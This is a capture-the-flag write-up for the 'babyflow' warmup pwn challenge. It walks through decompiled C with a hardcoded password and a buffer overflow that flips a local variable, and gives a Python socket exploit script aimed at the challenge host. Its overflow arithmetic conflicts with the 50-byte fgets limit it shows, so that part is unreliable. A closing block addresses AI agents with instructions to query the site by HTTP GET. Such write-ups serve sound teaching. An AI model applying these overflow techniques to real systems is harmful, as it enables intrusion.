# Warmup - Babyflow
## Challenge
## Warmup PWN Challenge: babyflow Writeup
In this writeup, we'll walk through solving the "Warmup" PWN challenge step by step. The goal is to exploit a buffer overflow vulnerability to bypass a password check and reveal the flag.
### Analyzing the Binary
We start by running binary ninja to decompile the file.
We examine the decompiled code snippet:
```c
int32_t main(int32_t argc, char** argv, char** envp)
{
int32_t var_c = 0;
printf("Enter password: ");
fgets(&buf, 50, stdin);
if (strncmp(&buf, "SuPeRsEcUrEPaSsWoRd123", 22) != 0)
puts("Incorrect Password!");
else
puts("Correct Password!");
if (var_c == 0)
puts("Are you sure you are admin? o.O");
else
puts("INTIGRITI{the_flag_is_different_…}");
return 0;
}
```
#### **Trying to use the password**
#### **Key Points:**
* The program asks for a password input and checks it using `strncmp` against the hardcoded string `"SuPeRsEcUrEPaSsWoRd123"`.
* If the password is correct, it checks the value of `var_c`.
* If `var_c` is still `0`, it prints a message asking if you are the admin.
* If `var_c` is non-zero, it reveals the flag.
### Step 2: Crafting the Exploit
We need to:
1. Input the correct password to pass the check.
2. Overflow the buffer to modify `var_c` and set it to a non-zero value, which will reveal the flag.
**Buffer Overflow:**
* The buffer size is 50 bytes, and the password takes up the first 22 bytes.
* That leaves 28 bytes for padding and overflow.
* We need to overflow into `var_c` (a 4-byte integer) and set it to `1`.
### Step 3: Writing the Python Exploit
Now, let's write a Python script to send the payload to the server.
```python
import socket
# Connect to the remote server
host = 'babyflow.ctf.intigriti.io'
port = 1331
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# Receive and print the initial message
response = s.recv(1024).decode('utf-8')
print(response)
# Prepare the exploit payload
password = "SuPeRsEcUrEPaSsWoRd123"
padding = "A" * (50 - len(password)) # Fill the buffer space
overflow_payload = padding + "\x01\x00\x00\x00" # Overwrite var_c with 1
# Send the payload
s.sendall((password + overflow_payload + "\n").encode('utf-8'))
# Receive and print the flag
response = s.recv(1024).decode('utf-8')
print(response)
# Close the connection
s.close()
```
### Step 4: Running the Exploit
Once the script is ready, simply run it using:
```bash
python babyflow.py
```
If the exploit is successful, the program will print the flag:
### Conclusion
This challenge demonstrates a classic buffer overflow attack. We bypass the password check by inputting the correct password, then overflow the buffer to manipulate a local variable (`var_c`). When `var_c` is changed from `0` to `1`, the program reveals the flag.
By following these steps, we successfully exploited the vulnerability and obtained the flag. This writeup covers the basic principles of exploiting buffer overflows in C programs and how to automate the process using Python.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://ctf.laet4x.com/ctf-2024/intigriti-2024/warmup-babyflow.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.